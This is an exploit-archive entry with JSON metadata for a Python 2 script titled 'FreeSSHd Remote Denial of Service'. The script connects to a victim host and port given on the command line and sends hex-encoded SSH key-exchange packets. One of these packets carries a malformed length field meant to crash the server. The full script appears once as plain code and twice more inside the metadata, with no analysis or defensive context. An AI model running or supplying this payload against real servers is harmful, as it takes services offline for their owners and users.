ID 1337DAY-ID-17299
Type zdt
Reporter Level
Modified 2011-12-24T00:00:00
Description
Exploit for windows platform in category dos / poc
import sys, socket, binascii
print "\n"
print "----------------------------------------------------------------"
print "| FreeSSHd, Remote Denial of Service |"
print "| Level, Smash the Stack |"
print "----------------------------------------------------------------"
print "\n"
buf = [
("5353482d322e302d50755454595f4b695454590d0a0000027c065a3db5f2230f6aed834d36a6fa8"
"55b1f140000009a6469666669652d68656c6c6d616e2d67726f75702d65786368616e67652d73686"
"13235362c6469666669652d68656c6c6d616e2d67726f75702d65786368616e67652d736861312c6"
"469666669652d68656c6c6d616e2d67726f757031342d736861312c6469666669652d68656c6c6d6"
"16e2d67726f7570312d736861312c727361323034382d7368613235362c727361313032342d73686"
"1310000000f7373682d7273612c7373682d6473730000009f6165733235362d6374722c616573323"
"5362d6362632c72696a6e6461656c2d636263406c797361746f722e6c69752e73652c61657331393"
"22d6374722c6165733139322d6362632c6165733132382d6374722c6165733132382d6362632c626"
"c6f77666973682d6374722c626c6f77666973682d6362632c336465732d6374722c336465732d636"
"2632c617263666f75723235362c617263666f75723132380000009f6165733235362d6374722c616"
"5733235362d6362632c72696a6e6461656c2d636263406c797361746f722e6c69752e73652c61657"
"33139322d6374722c6165733139322d6362632c6165733132382d6374722c6165733132382d63626"
"32c626c6f77666973682d6374722c626c6f77666973682d6362632c336465732d6374722c3364657"
"32d6362632c617263666f75723235362c617263666f75723132380000001f686d61632d736861312"
"c686d61632d736861312d39362c686d61632d6d64350000001f686d61632d736861312c686d61632"
"d736861312d39362c686d61632d6d6435000000096e6f6e652c7a6c6962000000096e6f6e652c7a6"
"c696200000000000000000000000000aac55b402546"),
("0000010c061e000001005e04d639ec531b5b8623f7ea733be6cc59d6439a40bbca110e1c2d45902"
"46cc2ef5deb76623f30c6181112c168ba4f1d253a6aebe45b6a5c496b59894233f4991c8969b68d4"
"3261e03d768dccda76f935f185b3168626d07a3c496cfb760e3fba82fd10dd309fec54a67bbbb294"
"5f316080d27768743c975d90728fc87b5b33774ed6e2ebf6106001d4f3342a8a83fd501b6b7cc7ac"
"e537f3bb83f2f0ff21af624f9353ab3e1ee2c5eebd9b5c36579656ad5a5fec779c88665abf1ced55"
"b8aa6272860e58c6c4482c1b83020e270487cf96b5cffffffff60534d770a69bcc1c71963827ba6e"
"3fb8a0c06f3bf64c3d426e67d00d90c679ee26388d2ef69f7357f9b2a688b4527")
]
def usage():
print "usage : ./freesshd.py <victim_ip> <victim_port>"
print "example: ./freesshd.py 192.168.1.22 22"
def main():
if len(sys.argv) != 3:
usage()
sys.exit()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
HOST = sys.argv[1]
PORT = int(sys.argv[2])
s.connect((HOST,PORT))
data = s.recv(1024)
print data
print "[*] Sending Payload...\n"
for i in range(0,len(buf)):
s.send(binascii.unhexlify(buf[i]))
print "[*] Closing Socket...\n"
s.close()
if __name__ == "__main__":
main()
# 0day.today [2018-01-01] #
{"hash": "d0a9c737466c5431c62fc2cb0fb65ca10ad3af47b9245ea75207645061d88099", "id": "1337DAY-ID-17299", "lastseen": "2018-01-01T19:01:58", "viewCount": 2, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "b0d3d3a91f21189719037cf41ad6dbfa", "key": "description"}, {"hash": "00a491f69799ec139f13607d454ae806", "key": "href"}, {"hash": "c1d38c73d89274b14344da9cb42251ac", "key": "modified"}, {"hash": "c1d38c73d89274b14344da9cb42251ac", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "a0db49ba470c1c9ae2128c3470339153", "key": "reporter"}, {"hash": "0a60676a401b8989c326a0ef7a39b53d", "key": "sourceData"}, {"hash": "762ff6079ea4c3a237fd43eb726c2b0d", "key": "sourceHref"}, {"hash": "63be722ee3fe4f7e8e7533db268b5d2e", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [], "modified": "2018-01-01T19:01:58"}, "vulnersScore": 5.0}, "type": "zdt", "sourceHref": "https://0day.today/exploit/17299", "description": "Exploit for windows platform in category dos / poc", "title": "FreeSSHd Remote Denial of Service", "history": [{"bulletin": {"hash": "c2ecb4e95503726ad7c82528426e6c90e5c443a8ae2ea3cdd25b6809bb7234f4", "id": "1337DAY-ID-17299", "lastseen": "2016-04-19T02:08:25", "enchantments": {"score": {"value": 8.5, "modified": "2016-04-19T02:08:25"}}, "hashmap": [{"hash": "c1d38c73d89274b14344da9cb42251ac", "key": "modified"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "b0d3d3a91f21189719037cf41ad6dbfa", "key": "description"}, {"hash": "817f9f9d6d7d5b51f7f6556f13d142f6", "key": "sourceHref"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "c1d38c73d89274b14344da9cb42251ac", "key": "published"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "a0db49ba470c1c9ae2128c3470339153", "key": "reporter"}, {"hash": "bfb9c6825d7ab4274558dbb3aa592afa", "key": "href"}, {"hash": "229da246639abb944ac752313b88424e", "key": "sourceData"}, {"hash": "63be722ee3fe4f7e8e7533db268b5d2e", "key": "title"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/17299", "description": "Exploit for windows platform in category dos / poc", "viewCount": 0, "title": "FreeSSHd Remote Denial of Service", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "import sys, socket, binascii\r\nprint \"\\n\" \r\nprint \"----------------------------------------------------------------\"\r\nprint \"| FreeSSHd, Remote Denial of Service |\"\r\nprint \"| Level, Smash the Stack |\"\r\nprint \"----------------------------------------------------------------\"\r\nprint \"\\n\"\r\nbuf = [\r\n (\"5353482d322e302d50755454595f4b695454590d0a0000027c065a3db5f2230f6aed834d36a6fa8\"\r\n \"55b1f140000009a6469666669652d68656c6c6d616e2d67726f75702d65786368616e67652d73686\"\r\n \"13235362c6469666669652d68656c6c6d616e2d67726f75702d65786368616e67652d736861312c6\"\r\n \"469666669652d68656c6c6d616e2d67726f757031342d736861312c6469666669652d68656c6c6d6\"\r\n \"16e2d67726f7570312d736861312c727361323034382d7368613235362c727361313032342d73686\"\r\n \"1310000000f7373682d7273612c7373682d6473730000009f6165733235362d6374722c616573323\"\r\n \"5362d6362632c72696a6e6461656c2d636263406c797361746f722e6c69752e73652c61657331393\"\r\n \"22d6374722c6165733139322d6362632c6165733132382d6374722c6165733132382d6362632c626\"\r\n \"c6f77666973682d6374722c626c6f77666973682d6362632c336465732d6374722c336465732d636\"\r\n \"2632c617263666f75723235362c617263666f75723132380000009f6165733235362d6374722c616\"\r\n \"5733235362d6362632c72696a6e6461656c2d636263406c797361746f722e6c69752e73652c61657\"\r\n \"33139322d6374722c6165733139322d6362632c6165733132382d6374722c6165733132382d63626\"\r\n \"32c626c6f77666973682d6374722c626c6f77666973682d6362632c336465732d6374722c3364657\"\r\n \"32d6362632c617263666f75723235362c617263666f75723132380000001f686d61632d736861312\"\r\n \"c686d61632d736861312d39362c686d61632d6d64350000001f686d61632d736861312c686d61632\"\r\n \"d736861312d39362c686d61632d6d6435000000096e6f6e652c7a6c6962000000096e6f6e652c7a6\"\r\n \"c696200000000000000000000000000aac55b402546\"),\r\n (\"0000010c061e000001005e04d639ec531b5b8623f7ea733be6cc59d6439a40bbca110e1c2d45902\"\r\n \"46cc2ef5deb76623f30c6181112c168ba4f1d253a6aebe45b6a5c496b59894233f4991c8969b68d4\"\r\n \"3261e03d768dccda76f935f185b3168626d07a3c496cfb760e3fba82fd10dd309fec54a67bbbb294\"\r\n \"5f316080d27768743c975d90728fc87b5b33774ed6e2ebf6106001d4f3342a8a83fd501b6b7cc7ac\"\r\n \"e537f3bb83f2f0ff21af624f9353ab3e1ee2c5eebd9b5c36579656ad5a5fec779c88665abf1ced55\"\r\n \"b8aa6272860e58c6c4482c1b83020e270487cf96b5cffffffff60534d770a69bcc1c71963827ba6e\"\r\n \"3fb8a0c06f3bf64c3d426e67d00d90c679ee26388d2ef69f7357f9b2a688b4527\")\r\n ]\r\ndef usage(): \r\n print \"usage : ./freesshd.py <victim_ip> <victim_port>\"\r\n print \"example: ./freesshd.py 192.168.1.22 22\" \r\ndef main(): \r\n if len(sys.argv) != 3: \r\n usage() \r\n sys.exit() \r\n \r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \r\n \r\n HOST = sys.argv[1] \r\n PORT = int(sys.argv[2]) \r\n s.connect((HOST,PORT)) \r\n data = s.recv(1024) \r\n print data \r\n print \"[*] Sending Payload...\\n\"\r\n for i in range(0,len(buf)):\r\n s.send(binascii.unhexlify(buf[i]))\r\n print \"[*] Closing Socket...\\n\"\r\n s.close() \r\nif __name__ == \"__main__\": \r\n main()\r\n\r\n\n\n# 0day.today [2016-04-19] #", "published": "2011-12-24T00:00:00", "references": [], "reporter": "Level", "modified": "2011-12-24T00:00:00", "href": "http://0day.today/exploit/description/17299"}, "lastseen": "2016-04-19T02:08:25", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "import sys, socket, binascii\r\nprint \"\\n\" \r\nprint \"----------------------------------------------------------------\"\r\nprint \"| FreeSSHd, Remote Denial of Service |\"\r\nprint \"| Level, Smash the Stack |\"\r\nprint \"----------------------------------------------------------------\"\r\nprint \"\\n\"\r\nbuf = [\r\n (\"5353482d322e302d50755454595f4b695454590d0a0000027c065a3db5f2230f6aed834d36a6fa8\"\r\n \"55b1f140000009a6469666669652d68656c6c6d616e2d67726f75702d65786368616e67652d73686\"\r\n \"13235362c6469666669652d68656c6c6d616e2d67726f75702d65786368616e67652d736861312c6\"\r\n \"469666669652d68656c6c6d616e2d67726f757031342d736861312c6469666669652d68656c6c6d6\"\r\n \"16e2d67726f7570312d736861312c727361323034382d7368613235362c727361313032342d73686\"\r\n \"1310000000f7373682d7273612c7373682d6473730000009f6165733235362d6374722c616573323\"\r\n \"5362d6362632c72696a6e6461656c2d636263406c797361746f722e6c69752e73652c61657331393\"\r\n \"22d6374722c6165733139322d6362632c6165733132382d6374722c6165733132382d6362632c626\"\r\n \"c6f77666973682d6374722c626c6f77666973682d6362632c336465732d6374722c336465732d636\"\r\n \"2632c617263666f75723235362c617263666f75723132380000009f6165733235362d6374722c616\"\r\n \"5733235362d6362632c72696a6e6461656c2d636263406c797361746f722e6c69752e73652c61657\"\r\n \"33139322d6374722c6165733139322d6362632c6165733132382d6374722c6165733132382d63626\"\r\n \"32c626c6f77666973682d6374722c626c6f77666973682d6362632c336465732d6374722c3364657\"\r\n \"32d6362632c617263666f75723235362c617263666f75723132380000001f686d61632d736861312\"\r\n \"c686d61632d736861312d39362c686d61632d6d64350000001f686d61632d736861312c686d61632\"\r\n \"d736861312d39362c686d61632d6d6435000000096e6f6e652c7a6c6962000000096e6f6e652c7a6\"\r\n \"c696200000000000000000000000000aac55b402546\"),\r\n (\"0000010c061e000001005e04d639ec531b5b8623f7ea733be6cc59d6439a40bbca110e1c2d45902\"\r\n \"46cc2ef5deb76623f30c6181112c168ba4f1d253a6aebe45b6a5c496b59894233f4991c8969b68d4\"\r\n \"3261e03d768dccda76f935f185b3168626d07a3c496cfb760e3fba82fd10dd309fec54a67bbbb294\"\r\n \"5f316080d27768743c975d90728fc87b5b33774ed6e2ebf6106001d4f3342a8a83fd501b6b7cc7ac\"\r\n \"e537f3bb83f2f0ff21af624f9353ab3e1ee2c5eebd9b5c36579656ad5a5fec779c88665abf1ced55\"\r\n \"b8aa6272860e58c6c4482c1b83020e270487cf96b5cffffffff60534d770a69bcc1c71963827ba6e\"\r\n \"3fb8a0c06f3bf64c3d426e67d00d90c679ee26388d2ef69f7357f9b2a688b4527\")\r\n ]\r\ndef usage(): \r\n print \"usage : ./freesshd.py <victim_ip> <victim_port>\"\r\n print \"example: ./freesshd.py 192.168.1.22 22\" \r\ndef main(): \r\n if len(sys.argv) != 3: \r\n usage() \r\n sys.exit() \r\n \r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \r\n \r\n HOST = sys.argv[1] \r\n PORT = int(sys.argv[2]) \r\n s.connect((HOST,PORT)) \r\n data = s.recv(1024) \r\n print data \r\n print \"[*] Sending Payload...\\n\"\r\n for i in range(0,len(buf)):\r\n s.send(binascii.unhexlify(buf[i]))\r\n print \"[*] Closing Socket...\\n\"\r\n s.close() \r\nif __name__ == \"__main__\": \r\n main()\r\n\r\n\n\n# 0day.today [2018-01-01] #", "published": "2011-12-24T00:00:00", "references": [], "reporter": "Level", "modified": "2011-12-24T00:00:00", "href": "https://0day.today/exploit/description/17299"}
{}
